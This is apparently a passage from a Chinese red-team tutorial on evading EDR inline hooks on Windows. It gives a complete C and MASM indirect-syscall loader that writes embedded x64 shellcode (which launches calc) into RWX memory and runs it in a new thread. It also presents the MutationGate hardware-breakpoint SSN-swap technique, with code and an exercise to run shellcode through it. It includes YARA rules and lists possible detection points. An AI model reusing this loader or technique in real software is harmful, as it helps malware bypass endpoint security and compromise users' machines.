*(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + + +UINT_PTR GetSyscallAddr(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + UINT_PTR syscall; + + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return 0; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return 0; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (_stricmp(funcName, pFunctionName) == 0) + { + syscall = (UINT_PTR)(pFunctionAddress + 0x12); + return syscall; + } + } + return 0; +} + + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + syscall_addr1 = GetSyscallAddr(ntdll, "NtOpenProcess"); + syscall_addr2 = syscall_addr1 + 0x20; + syscall_addr3 = syscall_addr1 + 0x40; + syscall_addr4 = syscall_addr1 + 0x60; + syscall_addr5 = syscall_addr1 + 0x80; + printf("Address of syscall instruction is 0x%p\n", syscall_addr1); + + + unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"; + + + LPVOID allocation_start; + SIZE_T allocation_size = sizeof(code); + HANDLE hThread; + NTSTATUS status; + + allocation_start = nullptr; + + + // Allocate Virtual Memory + if (NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0) + printf("Memory allocated at %p\n", allocation_start); + else + printf("Allocated failed, Error code is %d\n", GetLastError()); + + // Copy shellcode into allocated memory + if (NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), 0) == 0) + printf("Copied successfully\n"); + else + printf("Copied failed, Error code is %d\n", GetLastError()); + + + if (NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL) == 0) + printf("Executed successfully\n"); + else + printf("Executed failed, Error code is %d\n", GetLastError()); + + // Wait for the end of the thread and close the handle + NtWaitForSingleObject(hThread, FALSE, NULL); + NtClose(hThread); + + return 0; +} + +``` + +**stub.asm** 代码: + +``` +EXTERN syscall_addr1:QWORD +EXTERN syscall_addr2:QWORD +EXTERN syscall_addr3:QWORD +EXTERN syscall_addr4:QWORD +EXTERN syscall_addr5:QWORD + + +.code + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + jmp QWORD PTR [syscall_addr1] + ret +NtAllocateVirtualMemory ENDP + +NtWriteVirtualMemory PROC + mov r10, rcx + mov rax, 3Ah + jmp QWORD PTR [syscall_addr2] + ret +NtWriteVirtualMemory ENDP + +NtCreateThreadEx PROC + mov r10, rcx + mov rax, 0C2h + jmp QWORD PTR [syscall_addr3] + ret +NtCreateThreadEx ENDP + +NtWaitForSingleObject PROC + mov r10, rcx + mov rax, 4 + jmp QWORD PTR [syscall_addr4] + ret +NtWaitForSingleObject ENDP + +NtClose PROC + mov r10, rcx + mov rax, 0Fh + jmp QWORD PTR [syscall_addr5] + ret +NtClose ENDP + + +end + +``` + +我们在 C 代码里定义了全局变量 syscall_addr,因为该项目实际上还是 C++ 项目,所以需要稍微注意一下格式。出于演示程序的成功执行目的,我选择了 5 个连续的 syscall 指令的地址,如果我们想有意地选择良性 NTAPI 的 syscall 指令地址,需要仔细斟酌一下选择哪些。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/2DsOdplGlL9FcO2p-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/2DsOdplGlL9FcO2p-image.png) + +作为小练习,请写出没有混淆 syscall stub 的情况下,采用间接 syscall 调用的程序的 yara 的检测规则。 + +#### **syswhisper3** + +syswhisper3 是对 syswhisper2 的改进,也可以自动生成我们上面编写的间接 syscall 的程序所需要的相关文件。因为原理差不多,就不做额外解释了。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/mj4EKJRO4TmyLT2M-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/mj4EKJRO4TmyLT2M-image.png) + +导入所需文件的步骤与 syswhisper2 一致,代码也可以复用之前的。编译后,执行结果如下: + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/eg3w3eTT9cO0jLvz-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/eg3w3eTT9cO0jLvz-image.png) + +根据 asm 文件里的函数指令,可以创建相应的 yara 规则: + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/UDgNdEEjhCBLxC8e-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/UDgNdEEjhCBLxC8e-image.png) + +``` +rule syswhisper3 +{ + meta: + description = "Hunt for syswhispe3 generated asm code" + + strings: + $s1 = {48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 48 83 ec 28 b9 ?? ?? ?? ?? e8} + $s2 = {48 83 c4 28 48 8b 4c 24 08 48 8b 54 24 10 4c 8b 44 24 18 4c 8b 4c 24 20 4c 8b d1} + condition: + #s1 >=1 or #s2 >=1 +} + +``` + +因为我们导出了所有 NTAPI 的相关文件,匹配数自然很多。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/1B0dhGgwrx9PJtY4-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/1B0dhGgwrx9PJtY4-image.png) + +### **突变之门 MutationGate** + +突变之门 MutationGate 是我在近期的研究成果,其实也是属于间接 syscall 的一种。但毕竟是作者我提出的,所以必须给足牌面,单独安排一个中标题。Github 地址: [https://github.com/senzee1984/MutationGate](https://github.com/senzee1984/MutationGate) 以及英文研究文章: [https://winslow1984.com/books/malware/page/mutationgate](https://winslow1984.com/books/malware/page/mutationgate)  + +MutationGate 通过利用**硬件断点**来重定向系统调用,从而绕过 EDR 的内联 hook。MutationGate 的原理是调用一个未被 hook 的良性 NTAPI,并用被 hook 的 NTAPI 的 SSN 替换这个未被 hook 的 NTAPI 的 SSN。通过这种方式,syscall 被重定向到被 hook 的 NTAPI,而无需加载第 2 个 ntdll 模块或纂改已加载到内存中的 ntdll 模块,就可以绕过内联 hook。 + +EDR 倾向于为一些 NTAPI 设置内联 hook,特别是那些常在恶意软件中被利用的,如 NtAllocVirtualMemory。而不常被恶意软件利用的 NTAPI 往往不会被 hook,如 NtDrawText。EDR hook 所有 NTAPI 的可能性非常小。 + +假设 NTAPI NtDrawText 没有被 hook,而 NtQueryInformationProcess 被 hook 了,步骤如下: + +1. 获得 NtDrawText 的地址,通过 **GetModuleHandle 与 GetProcAddress 组合**,或者 **PEB Walking 与导出表解析**。 + +``` + pNTDT = GetFuncByHash(ntdll, 0xA1920265); //NtDrawText hash + pNTDTOffset_8 = (PVOID)((BYTE*)pNTDT + 0x8); //Offset 0x8 from NtDrawText + +``` + +2. 为 NtQueryInformationProcess 准备相应参数。 + +3. 在 **NtDrawText + 0x8** 处设置硬件断点,当执行流程到达这里时,SSN 已经存储在 RAX 中了,但 syscall 还未发起。 + +``` +0:000> u 0x00007FFBAD00EB68-8 +ntdll!NtDrawText: +00007ffb`ad00eb60 4c8bd1 mov r10,rcx +00007ffb`ad00eb63 b8dd000000 mov eax,0DDh +00007ffb`ad00eb68 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 +00007ffb`ad00eb70 7503 jne ntdll!NtDrawText+0x15 (00007ffb`ad00eb75) +00007ffb`ad00eb72 0f05 syscall +00007ffb`ad00eb74 c3 ret +00007ffb`ad00eb75 cd2e int 2Eh +00007ffb`ad00eb77 c3 ret + +``` + +4. 获取 NtQueryInformationProcess 的 SSN。在异常句柄里,用 NtQueryInformationProcess 的 SSN 替换 NtDrawText 的。 + +``` +...... +uint32_t GetSSNByHash(PVOID pe, uint32_t Hash) +{ + PBYTE pBase = (PBYTE)pe; + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + DWORD exportdirectory_foa = RvaToFileOffset(pImgNtHdrs, ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + exportdirectory_foa); //Calculate corresponding offset + PDWORD FunctionNameArray = (PDWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfNames)); + PDWORD FunctionAddressArray = (PDWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfFunctions)); + PWORD FunctionOrdinalArray = (PWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfNameOrdinals)); + + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + RvaToFileOffset(pImgNtHdrs, FunctionNameArray[i])); + DWORD Function_RVA = FunctionAddressArray[FunctionOrdinalArray[i]]; + if (Hash == ROR13Hash(pFunctionName)) + { + void *ptr = malloc(10); + if (ptr == NULL) { + perror("malloc failed"); + return -1; + } + unsigned char byteAtOffset5 = *((unsigned char*)(pBase + RvaToFileOffset(pImgNtHdrs, Function_RVA)) + 4); + //printf("Syscall number of function %s is: 0x%x\n", pFunctionName,byteAtOffset5); //0x18 + free(ptr); + return byteAtOffset5; + } + } + return 0x0; +} +...... + +``` + +5. 我们调用 NtDrawText 函数,但准备的却是 NtQueryInformationProcess 的参数,这个调用原本会失败的。但因为我们偷梁换柱了 SSN,调用会成功。 + +``` + fnNtQueryInformationProcess pNTQIP = (fnNtQueryInformationProcess)pNTDT; + NTSTATUS status = pNTQIP(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL); + +``` + +这个案例中,NtDrawText 的 SSN 为 0xdd,而 NtQueryInformationProcess 的 SSN 为 0x19,NtDrawText 的地址为 0x00007FFBAD00EB60 + +这个调用是发起到 NtDrawText 的地址,但准备的是 NtQueryInformationProcess 的参数,因为 SSN 从 0xdd 变为了 0x19,syscall 自然是成功的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/bSTThGQC0miGDypx-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/bSTThGQC0miGDypx-image.png) + +我们用之前的 yara 规则来扫描该 POC 程序,并没有发现符合的记录,这是当然的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/O0ZFLfCJXJRN1cZV-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/O0ZFLfCJXJRN1cZV-image.png) + +但破绽也是有的,为了便于观察,以 SleepEx 的 NTAPI **NtDelayExecution** 为例,syscall 是在 ntdll 空间里发起的,看起来还算合理。然而,ntoskrnl 里的 KeDelayExecutionThread 期望的是 NtDelayExecution 发起 syscall,而不是 NtDrawText。这个破绽可以作为检测点。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/UrbS5zVECo8GedtM-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/UrbS5zVECo8GedtM-image.png) + +#### **优势与检测** + +MutationGate 相比其他类似的 unhook 方案具有一定的优势,尽管依旧是可能检测的。 + +##### **优势** + +1. 不加载第 2 个 ntdll 模块 +2. 不纂改已加载的 ntdll 模块 +3. 不使用自定义的 syscall stub,因此没有对应的字节序列特征 +4. syscall 发生在 ntdll 模块中,看起来是合理的 + +##### **可能的检测方法** + +1. 在正常程序中,调用 **AddVectoredExceptionHandler** 有些可疑 +2. 从内核层检视调用栈,ntoskrnl.exe 中执行的函数与 ntdll 模块中执行的函数不一致 +3. 在良性 NTAPI 中发起的 syscall 不会期望得到不属于自身的 SSN + +#### **与其他类似方法的对比** + +HWSyscall([https://github.com/Dec0ne/HWSyscalls](https://github.com/Dec0ne/HWSyscalls)) 和 TamperingSyscall([https://github.com/rad9800/TamperingSyscalls](https://github.com/rad9800/TamperingSyscalls)) 都巧妙地利用硬件断点来绕过内联 hook,都是出色的方法。尽管在我获得灵感并发布 MutationGate 的期间里,我没有阅读和引用这两个项目,但的确利用了一些相似的技术和中心思想。我仔细阅读和研究了它们,并用表格总结与比较,如下所示: + +
方法调用的 API参数SSNSyscall 指令
突变之门良性 NTAPI目标 NTAPI 的参数良性 NTAPI 的 SSN -> 目标 NTAPI 的 SSN良性 NTAPI 中
HWSyscall目标 NTAPI目标 NTAPI 的参数提取目标 NTAPI 的 SSN最近的纯净 NTAPI 中
TamperingSyscall目标 NTAPI占位符参数 -> 目标 NTAPI 的参数通过 EDR 的检测后得到目标 NTAPI 的 SSN目标 NTAPI 中
间接 Syscall自定义汇编函数目标 NTAPI 的参数提取目标 NTAPI 的 SSN任何纯净的 NTAPI 中
+ +作为一个课后练习,请基于该 POC,用 MutationGate 的方法执行 calc 的 shellcode。 \ No newline at end of file